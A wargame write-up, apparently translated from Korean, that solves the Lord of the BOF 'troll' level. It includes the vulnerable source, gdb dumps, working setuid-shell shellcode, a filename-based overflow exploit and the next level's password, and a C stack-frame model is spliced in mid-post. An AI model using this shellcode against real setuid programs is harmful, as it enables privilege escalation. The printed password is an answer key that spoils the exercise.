[LOB] orge

Intro

Hello :D

The higher the level, the fewer options remain ㅠㅠ

This one even restricts the number of arguments (argc). Starting with the filename, the payload got pretty ugly.

Shall we begin?

Write UP

[orge@localhost orge]$ ll 
total 20 
-rwsr-sr-x    1 troll    troll       12693 Mar  1  2010 troll 
-rw-r--r--    1 root     root          772 Mar 29  2010 troll.c 
[orge@localhost orge]$ 
[orge@localhost orge]$ cat troll.c 
/* 
        The Lord of the BOF : The Fellowship of the BOF 
        - troll 
        - check argc + argv hunter 
*/ 

#include <stdio.h> 
#include <stdlib.h> 
#include <string.h>   /* memset, strlen, strcpy prototypes (lost in extraction) */ 

extern char **environ; 

main(int argc, char *argv[]) 
{ 
        char buffer[40]; 
        int i; 

        // here is changed 
        if(argc != 2){ 
                printf("argc must be two!\n"); 
                exit(0); 
        } 

        // egghunter 
        for(i=0; environ[i]; i++) 
                memset(environ[i], 0, strlen(environ[i])); 

        if(argv[1][47] != '\xbf') 
        { 
                printf("stack is still your friend.\n"); 
                exit(0); 
        } 

        // check the length of argument 
        if(strlen(argv[1]) > 48){ 
                printf("argument is too long!\n"); 
                exit(0); 
        } 

        strcpy(buffer, argv[1]); 
        printf("%s\n", buffer); 

        // buffer hunter 
        memset(buffer, 0, 40); 

        // one more! 
        memset(argv[1], 0, strlen(argv[1])); 
}

argc: exactly 2 arguments, no more, no less

Shellcode cannot be stored in environment variables (environ is zeroed)

argv[1]: the first argument is at most 48 bytes long and is zeroed at the end

Shellcode cannot be stored in the buffer (it is zeroed right after printing)

They blocked a lot..

There is exactly one path left: storing the NOP sled and shellcode in the filename!

First I'll create a /tmp/troll directory, then copy the troll binary under a name made of nop + shellcode.
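As an added example (my own, not code from the original post): a small C model of troll's frame, built from the layout the gdb dump shows (the 40-byte buffer at ebp-40, then the saved EBP, then the return address at offset 44), which reproduces troll's check-then-strcpy logic next to a copy bounded by the buffer's own size. The struct, the sentinel value and the function names are assumptions for illustration only.

```c
#include <stdint.h>
#include <string.h>

/* Constructed model of troll's frame as seen in the gdb dump: a 40-byte
 * buffer, the saved EBP at offset 40 and the return address at offset 44,
 * plus four bytes of slack for strcpy's terminating NUL. Not the real stack. */
#define BUF_SIZE 40
#define EBP_OFF  40
#define RET_OFF  44
#define MAX_LEN  48   /* troll only rejects strlen(argv[1]) > 48 */

struct frame_model { unsigned char raw[RET_OFF + 4 + 4]; };

static uint32_t le32(const unsigned char *p)
{ return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24; }

/* Zero the model and plant a sentinel return address (little-endian). */
void init_frame(struct frame_model *f, uint32_t ret)
{
    memset(f->raw, 0, sizeof f->raw);
    for (int i = 0; i < 4; i++)
        f->raw[RET_OFF + i] = (unsigned char)(ret >> (8 * i));
}

uint32_t model_ebp(const struct frame_model *f) { return le32(f->raw + EBP_OFF); }
uint32_t model_ret(const struct frame_model *f) { return le32(f->raw + RET_OFF); }

/* troll's logic: a length check against 48, then an unbounded copy into a
 * 40-byte buffer. Returns 1 when the copy was performed. */
int troll_copy(struct frame_model *f, const char *arg)
{
    size_t n = strlen(arg);
    if (n > MAX_LEN) return 0;
    memcpy(f->raw, arg, n + 1);   /* what strcpy(buffer, argv[1]) does */
    return 1;
}

/* Hardened form: the bound is the destination's own size, NUL included. */
int safe_copy(struct frame_model *f, const char *arg)
{
    size_t n = strlen(arg);
    if (n >= BUF_SIZE) return 0;
    memcpy(f->raw, arg, n + 1);
    return 1;
}

/* The post's probe input, "A" * 44 + "BBB" + "\xbf" (48 bytes), built here. */
const char *probe_input(void)
{
    static char buf[MAX_LEN + 1];
    memset(buf, 'A', 44);
    memcpy(buf + 44, "BBB", 3);
    buf[47] = (char)0xbf;
    return buf;             /* buf[48] is already '\0' (static storage) */
}
```

With the probe input, troll_copy leaves 0x41414141 in the saved EBP slot and 0xbf424242 in the return-address slot, exactly the words the gdb dump shows, while safe_copy refuses the input and the sentinel stays intact.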

[orge@localhost /tmp]$ mkdir troll 
[orge@localhost /tmp]$ 
[orge@localhost /tmp]$ cd ~ 
[orge@localhost orge]$ 
[orge@localhost orge]$ cp troll /tmp/troll/`python -c 'print "\x90" * 100 + "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"'` 
cp: cannot create regular file `/tmp/troll/▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒1̀▒É▒1▒F̀1▒Ph//shh/bin▒▒PS▒▒° 
                                                        ̀1▒̀': No such file or directory

Hmm.. the copy fails.

The name seems to be the problem.

After some googling: \x2f, which is the '/' character, cannot be part of a filename (it is the path separator).

The shellcode I was using contains \x2f.. So!!

I grabbed shellcode that does not contain that byte.

\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81

[orge@localhost troll]$ mv troll `python -c 'print "\x90" * 100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` 
[orge@localhost troll]$ ll 
total 14 
-rwsr-sr-x    1 orge     orge        12693 May  6 09:26 ????????????????????????????????????????????????????????????????????????????????????????????????????▒?^1ɱ2?l?▒??▒?u▒▒?▒▒▒▒▒2▒Qi00tii0cjo?▒QT?▒?▒?▒?

Ugh, so ugly.

Let's open this ugly thing in gdb.

[orge@localhost troll]$ gdb -q ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒^Q^1ɱ2▒l^N▒^A▒▒^Au▒▒^E▒▒▒▒▒2▒Qi00tii0cjo▒▒QT▒⚱^L΁ 
(gdb) set disassembly-flavor intel 
(gdb) disas main 
Dump of assembler code for function main: 
0x8048500 :       push   %ebp 
0x8048501 <main+1>:     mov    %ebp,%esp 
0x8048503 <main+3>:     sub    %esp,44 
0x8048506 <main+6>:     cmp    DWORD PTR [%ebp+8],2 
0x804850a <main+10>:    je     0x8048523 <main+35> 
0x804850c <main+12>:    push   0x8048690 
0x8048511 <main+17>:    call   0x8048410  
0x8048516 <main+22>:    add    %esp,4 
0x8048519 <main+25>:    push   0 
0x804851b <main+27>:    call   0x8048420  
0x8048520 <main+32>:    add    %esp,4 
0x8048523 <main+35>:    nop 
0x8048524 <main+36>:    mov    DWORD PTR [%ebp-44],0x0 
0x804852b <main+43>:    nop 
0x804852c <main+44>:    lea    %esi,[%esi*1] 
0x8048530 <main+48>:    mov    %eax,DWORD PTR [%ebp-44] 
0x8048533 <main+51>:    lea    %edx,[%eax*4] 
0x804853a <main+58>:    mov    %eax,%ds:0x80497cc 
0x804853f <main+63>:    cmp    DWORD PTR [%eax+%edx],0 
0x8048543 <main+67>:    jne    0x8048547 <main+71> 
0x8048545 <main+69>:    jmp    0x8048587 <main+135> 
0x8048547 <main+71>:    mov    %eax,DWORD PTR [%ebp-44] 
0x804854a <main+74>:    lea    %edx,[%eax*4] 
0x8048551 <main+81>:    mov    %eax,%ds:0x80497cc 
0x8048556 <main+86>:    mov    %edx,DWORD PTR [%eax+%edx] 
0x8048559 <main+89>:    push   %edx 
0x804855a <main+90>:    call   0x80483f0  
0x804855f <main+95>:    add    %esp,4 
0x8048562 <main+98>:    mov    %eax,%eax 
0x8048564 <main+100>:   push   %eax 
0x8048565 <main+101>:   push   0 
0x8048567 <main+103>:   mov    %eax,DWORD PTR [%ebp-44] 
0x804856a <main+106>:   lea    %edx,[%eax*4] 
0x8048571 <main+113>:   mov    %eax,%ds:0x80497cc 
0x8048576 <main+118>:   mov    %edx,DWORD PTR [%eax+%edx] 
0x8048579 <main+121>:   push   %edx 
0x804857a <main+122>:   call   0x8048430  
0x804857f <main+127>:   add    %esp,12 
0x8048582 <main+130>:   inc    DWORD PTR [%ebp-44] 
0x8048585 <main+133>:   jmp    0x8048530 <main+48> 
0x8048587 <main+135>:   mov    %eax,DWORD PTR [%ebp+12] 
0x804858a <main+138>:   add    %eax,4 
0x804858d <main+141>:   mov    %edx,DWORD PTR [%eax] 
0x804858f <main+143>:   add    %edx,47 
0x8048592 <main+146>:   cmp    BYTE PTR [%edx],0xbf 
0x8048595 <main+149>:   je     0x80485b0 <main+176> 
0x8048597 <main+151>:   push   0x80486a3 
0x804859c <main+156>:   call   0x8048410  
0x80485a1 <main+161>:   add    %esp,4 
0x80485a4 <main+164>:   push   0 
0x80485a6 <main+166>:   call   0x8048420  
0x80485ab <main+171>:   add    %esp,4 
0x80485ae <main+174>:   mov    %esi,%esi 
0x80485b0 <main+176>:   mov    %eax,DWORD PTR [%ebp+12] 
0x80485b3 <main+179>:   add    %eax,4 
0x80485b6 <main+182>:   mov    %edx,DWORD PTR [%eax] 
0x80485b8 <main+184>:   push   %edx 
0x80485b9 <main+185>:   call   0x80483f0  
0x80485be <main+190>:   add    %esp,4 
0x80485c1 <main+193>:   mov    %eax,%eax 
0x80485c3 <main+195>:   cmp    %eax,48 
0x80485c6 <main+198>:   jbe    0x80485e0 <main+224> 
0x80485c8 <main+200>:   push   0x80486c0 
0x80485cd <main+205>:   call   0x8048410  
0x80485d2 <main+210>:   add    %esp,4 
0x80485d5 <main+213>:   push   0 
0x80485d7 <main+215>:   call   0x8048420  
0x80485dc <main+220>:   add    %esp,4 
0x80485df <main+223>:   nop 
0x80485e0 <main+224>:   mov    %eax,DWORD PTR [%ebp+12] 
0x80485e3 <main+227>:   add    %eax,4 
0x80485e6 <main+230>:   mov    %edx,DWORD PTR [%eax] 
0x80485e8 <main+232>:   push   %edx 
0x80485e9 <main+233>:   lea    %eax,[%ebp-40] 
0x80485ec <main+236>:   push   %eax 
0x80485ed <main+237>:   call   0x8048440  
0x80485f2 <main+242>:   add    %esp,8 
0x80485f5 <main+245>:   lea    %eax,[%ebp-40] 
0x80485f8 <main+248>:   push   %eax 
0x80485f9 <main+249>:   push   0x80486d7 
0x80485fe <main+254>:   call   0x8048410  
0x8048603 <main+259>:   add    %esp,8 
0x8048606 <main+262>:   push   40 
0x8048608 <main+264>:   push   0 
0x804860a <main+266>:   lea    %eax,[%ebp-40] 
0x804860d <main+269>:   push   %eax 
0x804860e <main+270>:   call   0x8048430  
0x8048613 <main+275>:   add    %esp,12 
0x8048616 <main+278>:   mov    %eax,DWORD PTR [%ebp+12] 
0x8048619 <main+281>:   add    %eax,4 
0x804861c <main+284>:   mov    %edx,DWORD PTR [%eax] 
0x804861e <main+286>:   push   %edx 
0x804861f <main+287>:   call   0x80483f0  
0x8048624 <main+292>:   add    %esp,4 
0x8048627 <main+295>:   mov    %eax,%eax 
0x8048629 <main+297>:   push   %eax 
0x804862a <main+298>:   push   0 
0x804862c <main+300>:   mov    %eax,DWORD PTR [%ebp+12] 
0x804862f <main+303>:   add    %eax,4 
0x8048632 <main+306>:   mov    %edx,DWORD PTR [%eax] 
0x8048634 <main+308>:   push   %edx 
0x8048635 <main+309>:   call   0x8048430  
0x804863a <main+314>:   add    %esp,12 
0x804863d <main+317>:   leave 
0x804863e <main+318>:   ret 
0x804863f <main+319>:   nop 
End of assembler dump.

Let's set a breakpoint right after the strcpy and run it.

(gdb) r `python -c 'print "A" * 44 + "BBB" + "\xbf"'` 
Starting program: /tmp/troll/▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒^1ɱ2▒l▒▒▒u▒▒▒▒▒▒▒2▒Qi00tii0cjo▒▒QT▒⚱ 
΁ `python -c 'print "A" * 44 + "BBB" + "\xbf"'` 
PuTTY 
Breakpoint 1, 0x80485f2 in main () 
(gdb) x/200wx $esp 
0xbffff9b4:     0xbffff9c0      0xbffffbd4      0x00000014      0x41414141 
0xbffff9c4:     0x41414141      0x41414141      0x41414141      0x41414141 
0xbffff9d4:     0x41414141      0x41414141      0x41414141      0x41414141 
0xbffff9e4:     0x41414141      0x41414141      0xbf424242      0x00000000 
0xbffff9f4:     0xbffffa34      0xbffffa40      0x40013868      0x00000002 
0xbffffa04:     0x08048450      0x00000000      0x08048471      0x08048500 
0xbffffa14:     0x00000002      0xbffffa34      0x08048390      0x0804866c 
0xbffffa24:     0x4000ae60      0xbffffa2c      0x40013e90      0x00000002 
0xbffffa34:     0xbffffb34      0xbffffbd4      0x00000000      0xbffffc05 
0xbffffa44:     0xbffffc14      0xbffffc33      0xbffffc55      0xbffffc5f 
0xbffffa54:     0xbffffe22      0xbffffe41      0xbffffe5b      0xbffffe70 
0xbffffa64:     0xbffffe8c      0xbffffe97      0xbffffea4      0xbffffeac 
0xbffffa74:     0xbffffebd      0xbffffec7      0xbffffed5      0xbffffee6 
0xbffffa84:     0xbffffef4      0xbffffeff      0xbfffff0f      0x00000000 
0xbffffa94:     0x00000003      0x08048034      0x00000004      0x00000020 
0xbffffaa4:     0x00000005      0x00000006      0x00000006      0x00001000 
0xbffffab4:     0x00000007      0x40000000      0x00000008      0x00000000 
0xbffffac4:     0x00000009      0x08048450      0x0000000b      0x000001fb 
0xbffffad4:     0x0000000c      0x000001fb      0x0000000d      0x000001fb 
0xbffffae4:     0x0000000e      0x000001fb      0x00000010      0x0f8bfbff 
0xbffffaf4:     0x0000000f      0xbffffb2f      0x00000000      0x00000000 
0xbffffb04:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffb14:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffb24:     0x00000000      0x00000000      0x69000000      0x00363836 
0xbffffb34:     0x706d742f      0x6f72742f      0x902f6c6c      0x90909090 
0xbffffb44:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffb54:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffb64:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffb74:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffb84:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffb94:     0x90909090      0x90909090      0x90909090      0xeb909090 
0xbffffba4:     0xc9315e11      0x6c8032b1      0x8001ff0e      0xf67501e9 
0xbffffbb4:     0xeae805eb      0x32ffffff      0x306951c1      0x69697430 
0xbffffbc4:     0x6f6a6330      0x5451e48a      0xb19ae28a      0x0081ce0c 
0xbffffbd4:     0x41414141      0x41414141      0x41414141      0x41414141 
0xbffffbe4:     0x41414141      0x41414141      0x41414141      0x41414141 
0xbffffbf4:     0x41414141      0x41414141      0x41414141      0xbf424242 
0xbffffc04:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc14:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc24:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc34:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc44:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc54:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc64:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc74:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc84:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc94:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffca4:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffcb4:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffcc4:     0x00000000      0x00000000      0x00000000      0x00000000

It looks very strange, but we have to push through..!!

I can see where the NOPs are. Let's set the return address to 0xbffffb64 and fire it off.

[orge@localhost troll]$ /tmp/troll/▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒\xbf"'`▒▒▒▒▒▒▒▒▒▒▒▒▒^Q^1ɱ2▒l^N▒^A▒▒^Au▒▒^E▒▒▒▒▒2▒Qi00tii0cjo▒▒QT▒⚱^L΁ `python -c 'print "A" * 44 + "\x64\xfb\xff 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAd▒▒▒ 
Segmentation fault (core dumped)

It didn't work!!

Let's tear open our last hope, the core file.

[orge@localhost troll]$ gdb -q -c core 
Core was generated by `/tmp/troll/▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒'. 
Program terminated with signal 11, Segmentation fault. 
#0  0xbfffff63 in ?? () 
(gdb) x/200wx $esp 
0xbffff940:     0x00000000      0xbffff984      0xbffff990      0x40013868 
0xbffff950:     0x00000002      0x08048450      0x00000000      0x08048471 
0xbffff960:     0x08048500      0x00000002      0xbffff984      0x08048390 
0xbffff970:     0x0804866c      0x4000ae60      0xbffff97c      0x40013e90 
0xbffff980:     0x00000002      0xbffffa80      0xbffffb20      0x00000000 
0xbffff990:     0xbffffb51      0xbffffb60      0xbffffb7f      0xbffffba1 
0xbffff9a0:     0xbffffbab      0xbffffd6e      0xbffffd8d      0xbffffda7 
0xbffff9b0:     0xbffffdbc      0xbffffdd8      0xbffffde3      0xbffffdf0 
0xbffff9c0:     0xbffffdf8      0xbffffe09      0xbffffe13      0xbffffe21 
0xbffff9d0:     0xbffffe32      0xbffffe40      0xbffffe4b      0xbffffe5b 
0xbffff9e0:     0xbffffea8      0xbfffff4a      0x00000000      0x00000003 
0xbffff9f0:     0x08048034      0x00000004      0x00000020      0x00000005 
0xbffffa00:     0x00000006      0x00000006      0x00001000      0x00000007 
0xbffffa10:     0x40000000      0x00000008      0x00000000      0x00000009 
0xbffffa20:     0x08048450      0x0000000b      0x000001fb      0x0000000c 
0xbffffa30:     0x000001fb      0x0000000d      0x000001fb      0x0000000e 
0xbffffa40:     0x000001fb      0x00000010      0x0f8bfbff      0x0000000f 
0xbffffa50:     0xbffffa7b      0x00000000      0x00000000      0x00000000 
0xbffffa60:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffa70:     0x00000000      0x00000000      0x69000000      0x00363836 
0xbffffa80:     0x706d742f      0x6f72742f      0x902f6c6c      0x90909090 
0xbffffa90:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffaa0:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffab0:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffac0:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffad0:     0x90909090      0x90909090      0x90909090      0x90909090 
0xbffffae0:     0x90909090      0x90909090      0x90909090      0xeb909090 
0xbffffaf0:     0xc9315e11      0x6c8032b1      0x8001ff0e      0xf67501e9 
0xbffffb00:     0xeae805eb      0x32ffffff      0x306951c1      0x69697430 
0xbffffb10:     0x6f6a6330      0x5451e48a      0xb19ae28a      0x0081ce0c 
0xbffffb20:     0x00000080      0x00000000      0x00000000      0x00000000 
0xbffffb30:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffb40:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffb50:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffb60:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffb70:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffb80:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffb90:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffba0:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffbb0:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffbc0:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffbd0:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffbe0:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffbf0:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc00:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc10:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc20:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc30:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc40:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc50:     0x00000000      0x00000000      0x00000000      0x00000000

The address where the NOPs sit has shifted a bit (the core was dumped from a slightly different stack than the gdb run).

Let's change the RET part of the payload to 0xbffffab0.

Because the filename is so strange, the display gets mangled and overwritten all over the place, but ignore that and hammer it in!!

(Don't forget to create the symbolic link first!!)

[orge@localhost troll]$ ln -s ~/troll /tmp/troll/`python -c 'print "\x90" * 100 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` 
[orge@localhost troll]$ ll 
total 0 
lrwxrwxrwx    1 orge     orge           16 May  6 09:37 ????????????????????????????????????????????????????????????????????????????????????????????????????▒?^1ɱ2?l?▒??▒?u▒▒?▒▒▒▒▒2▒Qi00tii0cjo?▒QT?▒?▒?▒? -> /home/orge/troll 
[orge@localhost troll]$ 
[orge@localhost troll]$ /tmp/troll/▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒\xbf"'`▒▒▒▒▒▒▒▒▒▒▒▒▒^Q^1ɱ2▒l^N▒^A▒▒^Au▒▒^E▒▒▒▒▒2▒Qi00tii0cjo▒▒QT▒⚱^L΁ `python -c 'print "A" * 44 + "\xb0\xfa\xff 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒ 
bash$ whoami 
troll 
bash$ /bin/my-pass 
euid = 508 
aspirin

Exploit!!

Wrap-up

What would I have done without the core dump ㅠㅠ A true light..

Playing tricks with the filename was ugly to look at and a bit.. well. Clean is best after all.

I'm off to get ready to watch the Champions League!! See you in the next problem :D
